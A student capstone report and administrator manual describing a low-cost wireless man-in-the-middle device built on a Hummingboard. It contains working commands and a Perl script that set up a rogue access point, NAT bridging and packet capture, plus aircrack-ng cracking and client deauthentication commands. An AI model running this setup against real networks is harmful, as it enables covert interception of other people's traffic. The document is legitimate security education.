network surveillance apparatus - proj...
TRANSCRIPT
APRIL 10,,2015
NETWORK SURVEILLANCE APPARATUS
WiFiSpi SAIT Polytechnic
Final Report
Network Surveillance Apparatus
Aaron Collier, Steven Tran-Giang, Scott Matheson
WIFISPI PROJECT CHARTER PAGE 1
Table of Contents
Executive Summary .................................................................................................................... 3
Introduction .................................................................................................................................. 4
Project Purpose ........................................................................................................................... 5
Problem / Opportunity ................................................................................................................. 5
Background .................................................................................................................................. 5
Project Goal ................................................................................................................................. 5
Objectives .................................................................................................................................... 5
Key Stakeholders ........................................................................................................................ 6
Project Scope .............................................................................................................................. 7
Scope ........................................................................................................................................... 7
Out of Scope ................................................................................................................................ 7
Project Plan ................................................................................................................................. 8
Major Milestones ......................................................................................................................... 8
Budget .......................................................................................................................................... 9
Proposed Budget ......................................................................................................................... 9
Actual Budget .............................................................................................................................. 9
Results and Achievements ....................................................................................................... 10
Lessons Learned ....................................................................................................................... 10
Recommendations .................................................................................................................... 13
Conclusion ................................................................................................................................. 14
Acknowledgements ................................................................................................................... 15
References ................................................................................................................................ 16
Appendix .................................................................................................................................... 18
Terminology ............................................................................................................................... 18
Source Code .............................................................................................................................. 19
Setup/Configuration Script ........................................................................................................ 19
Preface ......................................................................................................................................... 2
Materials Needed ........................................................................................................................ 3
System Installation ...................................................................................................................... 4
Tool Configuration ....................................................................................................................... 5
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 2
DHCPD (/etc/dhcpd.conf)............................................................................................................ 5
wpa_supplicant (Wireless connection tool for cli)....................................................................... 5
airbase-ng (Wireless access point) ............................................................................................. 5
iptables (interface bridging and nat translation) ......................................................................... 6
Final Configuration Steps ............................................................................................................ 6
Other Commands ........................................................................................................................ 6
Example Script ............................................................................................................................ 7
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 3
Section
Executive Summary
1
The following report outlines our vision and goal of our final Capstone Project at SAIT Polytechnic. The network surveillance apparatus, is a low cost surveillance device to be used to monitor potential cyber criminals. This project will be completed by Team WiFiSpi, whose members consist of: Aaron Collier, Scott Matheson and Steven Tran-Giang as well as be under the supervision of Colin Chamberlain. We came up with the idea of wanting a cheap and easy way to survey a network without being detected. The intention of the network surveillance device is to have the ability to intercept packets and relay the information back to our server. Our server would then use Snort to filter out any suspicious packets that would match our rule sets. This is all done using a Hummingboard with two wireless NICs and an Alfa USB wireless adapter. The construction of this system will cost approximately $503 with labour being approximately $28,080. The grand total of implementing everything including labour is ~$28,583. The skills required to manufacture this project consisted of: scripting, a firm grasp of Linux, knowledge of NICs, snort, and finally the most important is to know how to troubleshoot. At the end of this project Team WiFiSpi will present the final deliverable, Network Surveillance Apparatus, to the SAIT instructors, the general public, and all IT professionals at the Information Technology Computer Systems Capstone Project Showcase.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 4
Section
Introduction
2
The Network Surveillance Apparatus is an idea we created on a cheap easy way of monitoring a suspicious network while leaving a minimal footprint on their network. We started by looking for a mini pc that would be capable of performing a man in the middle and be able to capture the packets that are sent from the network to the router. We went with the Hummingboard because we found that it offered everything we needed spec wise. As wireless becomes more and more prevalent in not only industry but also anywhere in a city being able to monitor suspicious traffic becomes much harder to do. With this device we plan on making it easier to be able to monitor the traffic in not only in an inconspicuous way but also an affordable way.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 5
Section
Project Purpose
3
Currently there are few devices that allow the tracking of network traffic/packets without leaving a footprint. The purpose of this project was to design and create a device that will covertly track the network traffic of a user or network. We planned on applying this in a law enforcement setting where an officer could set up said device and gather information on potential cyber criminals. This device was also planned to have the capability of sending logged packets back to a server where they will be filtered through snort on suspicious activity.
Problem / Opportunity
With this device we hope not only to appeal to law enforcement but also cater to companies who want an inexpensive way of tracking their own network. This can range from misuse of company equipment to unwanted guests in their network.
Background
The initial idea for the Network Surveillance Apparatus was formed by Scott Matheson. With Wi-Fi becoming more and more prevalent in today’s society he wanted to create a way to be able to monitor the traffic through wireless and not having to be directly plugged into the network. Originally the idea was closer to the black hat side and was pushed more to the white hat area by group member Aaron Collier.
Project Goal
The entire goal of Team WiFiSpi is to create a working prototype of the Network Surveillance Apparatus that will be able to be deployed in a law enforcement setting or a corporate environment.
Objectives
Objectives of the project that were completed:
Design and build a working prototype minicomputer that has the capability of conducting a successful man in the middle attack.
Design a working snort server that will filter our suspicious packets collected by the NSA.
Implement an FTP server between the NSA and server able to transfer all collected packets.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 6
Implement SSH on the NSA for remote access.
Automate the majority of the NSA.
Key Stakeholders
These will be the four key stakeholders for our proposed project.
Stakeholders Comment
Project Manager Aaron Collier, Scott Matheson, Steven Tran-Giang
Client Colin Chamberlain
Performing Organization WiFiSpi
Sponsor Colin Chamberlain
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 7
Section
Project Scope
4
The key components of the Network Surveillance Apparatus will be designed to intercept packets, successfully execute a middle man attack and to log suspicious packets and send it to our server. We have decided that these will be the major components that will be done but we also have several ideas that we wish to implement if we have enough time at the end of the project.
Scope
The major components that we will include in this project are:
Intercept packets
Successful middle man
Log all packets into a capture file
Send the capture file to our snort server through FTP.
Filter out suspicious packets using Snort rule sets. Potential components we had wished to add if we had time
Decrypting of encrypted packets.
Cellular capabilities
Out of Scope
Some things we considered that could be a part of our project but we have chosen to exclude are:
Remote management
Concealment
Battery optimization
Intelligent Automation
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 8
Section
Project Plan
5
The project was divided into three sections each overseen by a group member.
Building and troubleshooting hardware components – Aaron Collier
Learning, utilizing, optimizing and assembling software packages for tool use – Scott Matheson
Creating a troubleshooting scripts and software – Steven Tran-Giang
Major Milestones
The following is a list of all major milestones that were accomplished throughout the course of this project:
Arch Linux successfully running on the Hummingboard
Had all tools successfully on the Hummingboard
Snort successfully filtering packets
Successful Man in the Middle attack with the Hummingboard.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 9
Section
Budget
6
Proposed Budget
Hardware costs
Item Cost
HummingBoard-i2ex ~$110.00USD
HP ProLiant DL360P G8 $2104.83CDN
Computer(Hash Calculation System) ~$1000CDN
Wireless Network Interface Card ~$60CDN
Contingency Funds $500CDN
Operating Costs
Item Hours Rate Cost
Aaron 500 $90/hr $45000
Steven 500 $90/hr $45000
Scott 500 $90/hr $45000
Actual Budget
Hardware Costs
Item Cost
HummingBoard-i2ex ~$110.00USD
HP ProLiant DL360P G8 $2104.83CDN
Alfa Wireless USB Card $42.99
Wireless Network Interface Card ~$60CDN
Contingency Funds $500CDN
Operating Costs
Item Hours Rate Cost
Aaron 79 $90/hr $7110
Steven 58 $90/hr $5220
Scott 95 $90/hr $8550
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 10
Section
Results and Achievements
7
Upon completion of this project Team WiFiSpi has produced:
A functional Hummingboard capable of executing a successful man in the middle attack with the ability to intercept and log packets. It also has the capability of sending the packets to our FTP/Snort server for filtering.
FTP/Snort Server capable of receiving capture files from the NSA and filtering out packets based on a rule set to be further analyzed.
A better understanding of how easy it is to intercept packets through wireless.
An understanding on the entire process of taking on a project and the steps needed to complete one from beginning to end.
The completion of this project has helped each group member grow as an IT professional.
Lessons Learned
Wifi - ip link set wlp1s0 - iw dev wlp1s0 scan –Apscan (not for setup) - iw dev wlp1s0 set type ibss (Ad-hoc mode) - wpa_supplicant _B –D n180211, wext –I wlp1s0 –c <(wpa_passphrase “SSID” “WPA2
Key” - dchpcd wlp1s0 - wpa_passphrase “ssid” “pass” >> /etc/wpa_supplicant.conf - iw dev wlp1s0 link (checks connection)
Aircrack
- ifconfig wlp1s0 down - iwconfig wlp1s0 mode monitor - ifconfig wlp1s0 up - airmon-ng start wlp1s0 - airodump-ng mon0
Aircrack-ng
- -b “Mac Address” - -l ”outfile.txt”
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 11
- -s = speed test - -r “path/to/airolib/database
Tcpdump
- -F(foo.bar): use file for filter expressions - -i <interface> - -w: write to file - -vvv: three levels verbose
Filters Protocols: TCP, UDP, HTTP, HTTPS, SFTP, SSL, POP, IMAP, FTP, SMTP
Airbase-ng –a <AP MAC> - essid “ssid” - c <channel> mon0 -Z 4 –WPA2 CCMP (use with Wl) -F <foo.pcap> -packet output file Bridge AP
- Airmon-ng start wlan0 11 - Airbase-ng –e SSID –c 6 –W 1 –Z4 mon0& - Ifconfig at0 up - Ifconfig at0 192.168.2.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400 - ifconfig wlan0 mtu 2000 - TCPdump –ni at0 –s0 –w capture.pcap
- -iwconfig frag 2346 - -iwconfig wlan0 channel 36
- -route add –net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
- -iptables –t mat –A POSTROUTINF –o eth0 –j MASQUERADE - -iptables -A FORWARD –I eth0 –I at0 –m state –state RELATEDESTABLISHED –j
ACCEPT - -iptables –A FORWARD –I at0 –o eth0 –j ACCEPT
- -echo 1 > /proc/sys/net/ipv4/ip_Forward
- -dhcpd at0
Monitor
- Airodump-ng –d <MAC> -a –c1 w1p1s0
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 12
Deauth
- Aireplay-ng -0 6 –a “APMAC” –c “Client MAC” mon 0 Install Snort
- yum install flex; - yum install bison; - yum install libpcap; - yum install libpcap-devel; - yum install zlib; - yum install zlib-devel; - yum install pcre; - yum install pcre-devel; - yum install libdnet; - yum install libdnet-devel; - yum install tcpdump; - yum install http://www.snort.org/downloads/snort/snort-2.9.7.2-1.centos7.x86_64.rpm
SFTP
- AllowedUsers - UsePAM - passwordAuthentication - permitrootlogin
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 13
-
Section
Recommendations
8
Technical Recommendations
Use a microcomputer that you know is compatible with the OS you want to use
Make sure the chipsets of all tools are compatible and fully supported
Know the security policies of the network you are on
Verify hardware driver support Team Recommendations
Start project ASAP, or you will fall behind very quickly.
Account for last minute changes and emergencies in your Gantt chart.
Document, document, document.
If you come up with your own project be prepared for a lot of self-guidance.
Know that anything that can go wrong will go wrong.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 14
Section
Conclusion
9
Team WiFiSpi successfully created a prototype (NSA) which allowed for the interception of packets and the transfer of the capture files to a FTP/Snort Server for further analysis. We also created a proof of concept Snort server that with more time would filter out suspicious packets on rulesets we have created/chosen that would best suit our needs. Throughout the entirety of the project we encountered many obstacles, from Kali/PwnPi not working on the Hummingboard to SAIT’s network policies causing havoc with our interception of packets, we faced each problem thrown at us and achieved what we set out to do. The final product, the Network Surveillance Apparatus, is a fully functioning wireless surveillance device.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 15
Section
Acknowledgements
10
Team WiFiSpi wishes to thank the individuals who provided invaluable knowledge and the assistance of our project: Colin Chamberlain – Project sponsor, provided us with server hardware, monitors, keyboards, mice. As well as keeping us on track with the project over the last thirteen weeks. Tim Williams – Help with TCP dumps and Snort Dylan Saunders – Tunneling two connections Jason Fisher – Miscellaneous hardware and access to soldering iron. Arch Linux Community Solid-Run Community Aircrack-ng Community William Parker – CentOS Snort Setup Guide
Linux Man Pages
APRIL 10, 2015
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 16
Section
References
11
[1]W. Parker, S3.amazonaws.com, 2015. [Online]. Available: https://s3.amazonaws.com/snort-org-
site/production/document_files/files/000/000/063/original/snort-centos6x-7x-
2970.pdf?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1428438869&Signature=EWs
j4fK2P3IsVRBUyaJZss%2BRLMo%3D. [Accessed: 07- Apr- 2015].
[2]F. Wiles, 'HOWTO: Linux NAT in Four Steps using iptables', Revolution Systems, 2015. [Online].
Available: http://www.revsys.com/writings/quicktips/nat.html. [Accessed: 10- Apr- 2015].
[3] Aircrack-ng.org, 'Aircrack-ng - Main documentation', 2015. [Online]. Available: http://www.aircrack-
ng.org/documentation.html. [Accessed: 10- Apr- 2015].
[4] Linux.die.net, 'dhcpd(8): Dynamic Host config Protocol Server - Linux man page', 2015. [Online].
Available: http://linux.die.net/man/8/dhcpd. [Accessed: 10- Apr- 2015].
[5] Daemon-systems.org, 'dhcpcd.8', 2015. [Online]. Available: http://www.daemon-
systems.org/man/dhcpcd.8.html. [Accessed: 10- Apr- 2015].
[6] Tcpdump.org, 'Manpage of TCPDUMP', 2015. [Online]. Available:
http://www.tcpdump.org/tcpdump_man.html. [Accessed: 10- Apr- 2015].
[7] Linux.die.net, 'iwconfig(8) - Linux man page', 2015. [Online]. Available:
http://linux.die.net/man/8/iwconfig. [Accessed: 10- Apr- 2015].
[8] Linux.die.net, 'wpa_supplicant(8) - Linux man page', 2015. [Online]. Available:
http://linux.die.net/man/8/wpa_supplicant. [Accessed: 10- Apr- 2015].
[9] Linux.die.net, 'wpa_passphrase(8) - Linux man page', 2015. [Online]. Available:
http://linux.die.net/man/8/wpa_passphrase. [Accessed: 10- Apr- 2015].
[10] Ipset.netfilter.org, 'Man page of IPTABLES', 2015. [Online]. Available:
http://ipset.netfilter.org/iptables.man.html. [Accessed: 10- Apr- 2015].
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 17
. . . . . . . . .
[11] Wiki.solid-run.com, 'CuBox-i Wiki Pages', 2015. [Online]. Available: http://wiki.solid-
run.com/Main_Page. [Accessed: 10- Apr- 2015].
[12] Wiki.archlinux.org, 'ArchWiki', 2015. [Online]. Available: https://wiki.archlinux.org/. [Accessed: 10-
Apr- 2015].
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 18
. . . . . . . . .
Section
Appendix
12
The following is a list of terminology used within this document that might require further explanation: Packets: A formatted unit of data sent between packet to packet systems that contains information that allows computers to talk to each other. NIC: Network Interface controller, Hardware that connects the computer to a network. Snort: An open source, intrusion prevention system. Microcomputer: A computer that fits the size of a credit card. Footprint: The impact you have on a network. Cyber Criminal: An individual committing illegal activities through the use of a computer and internet. Black Hat: An individual who hacks into a system with nefarious intentions White Hat: An individual who hacks into a system with good intentions (research, vulnerability testing) Man in the Middle Attack: A MITM is essentially equivalent to an individual eavesdropping onto a conversation without either party knowing. FTP Server: File Transfer Protocol, transfers files between computers SSH: Secure shell used for remote access Capture File: Log of all traffic on a network captured by some software. Encrypt: The processes of encoding messages. Decrypt: The processes of decoding encrypted messages.
Section
Terminology
A
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 19
. . . . . . . . .
Setup/Configuration Script
#!/usr/bin/perl $wireless=X; $backpass=X; print "Quick start Configuration script\n\n"; while($wireless ne "Y" && $wireless ne "N") { print "Will you be using a wireless backend? (Y/N): "; chomp($wireless=<stdin>); $wireless=uc($wireless); if($wireless eq Y) { system("iwconfig"); print "Please indicate wireless interface you wish to use: "; chomp($backadapt=<stdin>); print "Please indicate the SSID(name) of the wireless connection you wish to use: "; chomp($backssid=<stdin>); while($backpass ne "Y" && $backpass ne "N") { print "Is there a passphrase on this connection? Y/N: "; chomp($backpass=<stdin>); $backpass=uc($backpass); if($backpass eq "Y") { print "Please enter the passphrase (Case sensitive): "; system("stty -echo"); chomp($passphrase=<stdin>); system("stty echo"); print "\n"; } elsif($backpass eq "N") { print "No wireless passphrase selected\n"; } else {
Section
Source Code
B
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 20
. . . . . . . . .
print "Error: Invalid input\n\n"; } } } elsif($wireless eq N) { system("ifconfig"); print "Please indicate physical interface you wish to use: "; chomp($backadapt=<stdin>); } else { print "Error: Invalid input\n\n"; } } system("iwconfig"); print "NOTE: If using a wireless backend you must use a secondary wireless interface for soft AP configuration\n"; print "Please indicate wireless interface you wish to use for soft access point: "; chomp($apadapt=<stdin>); print "Please indicate the name(SSID) you wish to broadcast: "; chomp($apssid=<stdin>); print "Please wait while system in configured..\n"; sleep(2); system("killall -9 dhcpd"); system("killall -9 airbase-ng"); system("killall -9 dhcpcd"); system("killall -9 wpa_supplicant"); system("killall -9 tcpdump"); system("airmon-ng stop mon3"); system("airmon-ng stop mon2"); system("airmon-ng stop mon1"); system("airmon-ng stop mon0"); system("iptables -F"); system("iptables -X"); system("iptables -t nat -F"); system("iptables -t nat -X"); system("iptables -P INPUT ACCEPT"); system("iptables -P FORWARD ACCEPT"); system("iptables -P OUTPUT ACCEPT"); sleep (3); if($wireless eq "Y") { system("ip link set $backadapt up"); sleep (2); system("wpa_passphrase $backssid $passphrase > /etc/wpa_supplicant.conf");
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 21
. . . . . . . . .
system("wpa_supplicant -B -D nl80211,wext -i $backadapt -c /etc/wpa_supplicant.conf"); sleep (10); system("dhcpcd $backadapt"); sleep (5); } system("airmon-ng start $apadapt"); sleep (5); system("airmon-ng start $apadapt"); sleep (5); system("airbase-ng -e $apssid -c 1 mon0 &"); sleep (5); system("ifconfig at0 up"); system("ifconfig at0 192.168.2.1 netmask 255.255.255.0"); system("ifconfig at0 mtu 1800"); system("route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1"); system("iptables -t nat -A POSTROUTING -o $backadapt -j MASQUERADE"); system("iptables -A FORWARD -i $backadapt -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT"); system("iptables -A FORWARD -i at0 -o $backadapt -j ACCEPT"); system("echo 1 > /proc/sys/net/ipv4/ip_forward"); system("echo > /var/lib/dhcp/dhcpd.leases"); system("dhcpd at0"); system("tcpdump -ni at0 -s 0 -w /root/capture/capture.pcap &"); sleep (2); system("echo Setup Complete.");
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 22
. . . . . . . . .
WiFiSpi SAIT Polytechnic
Administrator Manual
Network Surveillance Apparatus
Aaron Collier, Steven Tran-Giang, Scott Matheson
WIFISPI PROJECT CHARTER PAGE 1
Table of Contents
Preface ......................................................................................................................................... 2
Materials Needed ........................................................................................................................ 3
System Installation ...................................................................................................................... 4
Tool Configuration ....................................................................................................................... 5
DHCPD (/etc/dhcpd.conf)............................................................................................................ 5
wpa_supplicant (Wireless connection tool for cli)....................................................................... 5
airbase-ng (Wireless access point) ............................................................................................. 5
iptables (interface bridging and nat translation) ......................................................................... 6
Final Configuration Steps ............................................................................................................ 6
Other Commands ........................................................................................................................ 6
Example Script ............................................................................................................................ 7
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 2
Section
Preface
A
The following manual will guide you through the installation, configuration, and management of the Network Surveillance Apparatus developed by Team WiFiSpi. This guide assumes you have a foundational knowledge of Linux operating system, a scripting language (Perl is used throughout the course of this manual), and Linux network tools. This is a very early alpha prototype and is still missing some of the more advanced features and configurations.
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 3
Section
Materials Needed
1
Hardware:
ARM Microcomputer (Solid-run Hummingboard-I2eX used in this example)
2 Wireless network adapters (Atheros chipset recommended)
o http://www.aircrack-ng.org/doku.php?id=compatibility_drivers – Comprehensive list
of chipset compatibility with aircrack-ng suite
MicroSD storage (32-64Gb recommended)
Back end server capable of running as an FTP server, as well as Snort detection box
o Linux based operating system recommended for best results
Wireless router
Wireless host system
Software:
Linux based operating system
o Archlinux is recommended due to its lightweight design
Aircrack-ng suite
o Please note: Additional driver patches may be necessary to ensure wireless adapter
functionality
DHCPD - dhcp server daemon
DHCPCD – dhcp client daemon
Tcpdump
iwconfig
wpa_supplicant & wpa_passphrase
iptables
SDFormatter
Win32DiskImager
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 4
Section
System Installation
2
1. Download the Operating system image of your choice (Installation may vary depending on
hardware configuration)
2. Prepare the SD card by performing a full format
- SDFormatter is a simple Windows tool to achieve this
- df may be used on Linux systems
3. Image the Operating System onto the SD card
- Win32DiskImager is a simple windows disk imaging tool
- dd is a linux tool that can be used to image disks
4. Insert the SD card into the Microcomputer and run any updates/initial configurations as
defined by the developer.
5. Begin installation of all required tools and modules from official system or git repositories.
Note: some tools may come pre-packaged with your chosen distribution; verify if they are
pre-installed before attempting to install any tools.
- Aircrack-ng suite
- dhcpd
- dhcpcd
- tcpdump
- iwconfig
- wpa_supplicant
- wpa_passphrase
- iptables
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 5
Section
Tool Configuration
3
The following are example configurations used in testing to enable basic functionality of the device. These configurations may be changed in order to promote further and more advanced functions.
DHCPD (/etc/dhcpd.conf)
option domain-name-servers 208.67.222.222, 208.67.220.220; default-lease-time 600; max-lease-time 7600; ddns-update-style none; authoritative; log-facility local7; subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.2 192.168.2.254; option routers 192.168.2.1; option domain-name-servers 208. 67.222.222, 208.67.220.220; }
wpa_supplicant (Wireless connection tool for cli)
wpa_passphrase “WirelessSSID” “WPA2Passphrase” > /etc/wpa_supplicant.conf - Creates configuration file with your wireless credentials wpa_supplicant –B –D nl80211,wext -i “wlan0” –c /etc/wpa_supplicant.conf - Uses wireless credentials to establish connection dhcpcd wlan0 - Client-side dhcp client
airbase-ng (Wireless access point)
airmon-ng start “wlan1” - Starts monitor mode wireless interface airbase-ng -e “WirelessSSID” -c 1 mon0 & - Creates unencrypted soft access point interface on channel 1 as background job ifconfig at0 up - Makes the SoftAP interface active ifconfig at0 192.168.2.1 netmask 255.255.255.0 - Assigns an IP and network mask to the interface to match DHCPD configuration ifconfig at0 mtu 1800 - Increases the max transmission unit (in bytes) for the interface route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1 - Adds interface into linux route table
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 6
iptables (interface bridging and nat translation)
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE iptables -A FORWARD -i wlan0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -i at0 -o wlan0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward - Creates a simple NAT bridge between network interfaces to carry traffic in and out
Final Configuration Steps
echo > /var/lib/dhcp/dhcpd.leases - Clears leases file (Note: The file path may vary with distribution) dhcpd at0 - Starts dhcp server on SoftAP allowing hosts to obtain IP leases tcpdump -ni at0 -s 0 -w /path/to/captures/capture.pcap & - Begins a dump of network traffic to a pcap file
Other Commands
iwconfig wlan0 channel x - Changes the channel of wlan0 (and all software interfaces using it) to x airodump-ng mon0 - Dumps a wireless network scan, very useful in gathering information on networks. aireplay-ng - Tool offering various methods of client de-authentication
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 7
Section
Example Script
4
#!/usr/bin/perl $wireless=X; $backpass=X; print "Quick start Configuration script\n\n"; while($wireless ne "Y" && $wireless ne "N") { print "Will you be using a wireless backend? (Y/N): "; chomp($wireless=<stdin>); $wireless=uc($wireless); if($wireless eq Y) { system("iwconfig"); print "Please indicate wireless interface you wish to use: "; chomp($backadapt=<stdin>); print "Please indicate the SSID(name) of the wireless connection you wish to use: "; chomp($backssid=<stdin>); while($backpass ne "Y" && $backpass ne "N") { print "Is there a passphrase on this connection? Y/N: "; chomp($backpass=<stdin>); $backpass=uc($backpass); if($backpass eq "Y") { print "Please enter the passphrase (Case sensitive): "; system("stty -echo"); chomp($passphrase=<stdin>); system("stty echo"); print "\n"; } elsif($backpass eq "N") { print "No wireless passphrase selected\n"; } else { print "Error: Invalid input\n\n"; } } }
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 8
elsif($wireless eq N) { system("ifconfig"); print "Please indicate physical interface you wish to use: "; chomp($backadapt=<stdin>); } else { print "Error: Invalid input\n\n"; } } system("iwconfig"); print "NOTE: If using a wireless backend you must use a secondary wireless interface for soft AP configuration\n"; print "Please indicate wireless interface you wish to use for soft access point: "; chomp($apadapt=<stdin>); print "Please indicate the name(SSID) you wish to broadcast: "; chomp($apssid=<stdin>); print "Please wait while system in configured..\n"; sleep(2); system("killall -9 dhcpd"); system("killall -9 airbase-ng"); system("killall -9 dhcpcd"); system("killall -9 wpa_supplicant"); system("killall -9 tcpdump"); system("airmon-ng stop mon3"); system("airmon-ng stop mon2"); system("airmon-ng stop mon1"); system("airmon-ng stop mon0"); system("iptables -F"); system("iptables -X"); system("iptables -t nat -F"); system("iptables -t nat -X"); system("iptables -P INPUT ACCEPT"); system("iptables -P FORWARD ACCEPT"); system("iptables -P OUTPUT ACCEPT"); sleep (3); if($wireless eq "Y") { system("ip link set $backadapt up"); sleep (2); system("wpa_passphrase $backssid $passphrase > /etc/wpa_supplicant.conf"); system("wpa_supplicant -B -D nl80211,wext -i $backadapt -c /etc/wpa_supplicant.conf"); sleep (10); system("dhcpcd $backadapt"); sleep (5); }
FORMAL REPORT – NETWORK SURVEILLANCE APPARATUS PAGE 9
system("airmon-ng start $apadapt"); sleep (5); system("airmon-ng start $apadapt"); sleep (5); system("airbase-ng -e $apssid -c 1 mon0 &"); sleep (5); system("ifconfig at0 up"); system("ifconfig at0 192.168.2.1 netmask 255.255.255.0"); system("ifconfig at0 mtu 1800"); system("route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1"); system("iptables -t nat -A POSTROUTING -o $backadapt -j MASQUERADE"); system("iptables -A FORWARD -i $backadapt -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT"); system("iptables -A FORWARD -i at0 -o $backadapt -j ACCEPT"); system("echo 1 > /proc/sys/net/ipv4/ip_forward"); system("echo > /var/lib/dhcp/dhcpd.leases"); system("dhcpd at0"); system("tcpdump -ni at0 -s 0 -w /root/capture/capture.pcap &"); sleep (2); system("echo Setup Complete.”);